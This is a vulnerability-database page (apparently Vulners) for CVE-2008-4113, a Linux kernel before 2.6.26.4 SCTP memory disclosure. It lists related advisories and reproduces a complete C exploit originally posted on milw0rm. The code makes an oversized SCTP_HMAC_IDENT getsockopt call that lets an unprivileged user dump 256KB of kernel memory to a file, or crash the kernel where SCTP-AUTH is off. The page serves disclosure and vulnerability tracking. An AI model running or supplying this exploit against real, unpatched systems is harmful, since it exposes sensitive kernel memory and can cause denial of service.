Vulners
Lucene search
Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure
| Reporter | Title | Published | Views | Family All 37 |
|---|---|---|---|---|
 | Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit | 29 Dec 200800:00 | – | zdt |
 | CVE-2008-4113 | 29 Dec 200800:00 | – | circl |
 | CVE-2008-4113 | 16 Sep 200823:00 | – | cve |
 | CVE-2008-4113 | 16 Sep 200823:00 | – | cvelist |
 | [SECURITY] [DSA 1655-1] New Linux 2.6.24 packages fix several vulnerabilities | 17 Oct 200800:19 | – | debian |
 | Debian DSA-1655-1 : linux-2.6.24 - denial of service/information leak/privilege escalation | 20 Oct 200800:00 | – | nessus |
| Mandriva Linux Security Advisory : kernel (MDVSA-2008:223) | 23 Apr 200900:00 | – | nessus |
| openSUSE Security Update : kernel (kernel-270) | 21 Jul 200900:00 | – | nessus |
| Ubuntu 6.06 LTS / 7.10 / 8.04 LTS : linux, linux-source-2.6.15/22 vulnerabilities (USN-659-1) | 23 Apr 200900:00 | – | nessus |
 | EUVD-2008-4096 | 7 Oct 202500:30 | – | euvd |
10
/*
* cve-2008-4113.c
*
* Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113
*
* The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream
* Control Transmission Protocol (sctp) implementation in the Linux kernel
* before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an
* untrusted length value to limit copying of data from kernel memory, which
* allows local users to obtain sensitive information via a crafted
* SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.
*
* Notes:
*
* If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an
* unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory
* out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will
* trigger a kernel OOPS.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#ifndef SCTP_HMAC_IDENT
#define SCTP_HMAC_IDENT 22
#endif
#define DUMP_SIZE 256*1024
#define DUMP_FILE "mem.dump"
int
main(int argc, char **argv)
{
int ret, sock;
FILE *dumpfile;
char *memdump, *err;
socklen_t memlen = DUMP_SIZE;
memdump = malloc(DUMP_SIZE);
if (!memdump) {
err = "malloc(3) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
memset(memdump, 0, DUMP_SIZE);
printf("[+] creating IPPROTO_SCTP socket\n");
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
if (sock == -1) {
err = "socket(2) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen);
ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen);
if (ret == -1) {
err = "getsockopt(2) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE);
dumpfile = fopen(DUMP_FILE, "wb");
if (!dumpfile) {
err = "fopen(3) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(memdump, 1, memlen, dumpfile);
fclose(dumpfile);
printf("[+] done.\n");
return 0;
}
// milw0rm.com [2008-12-29]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Dec 2008 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 24.7
EPSS0.0019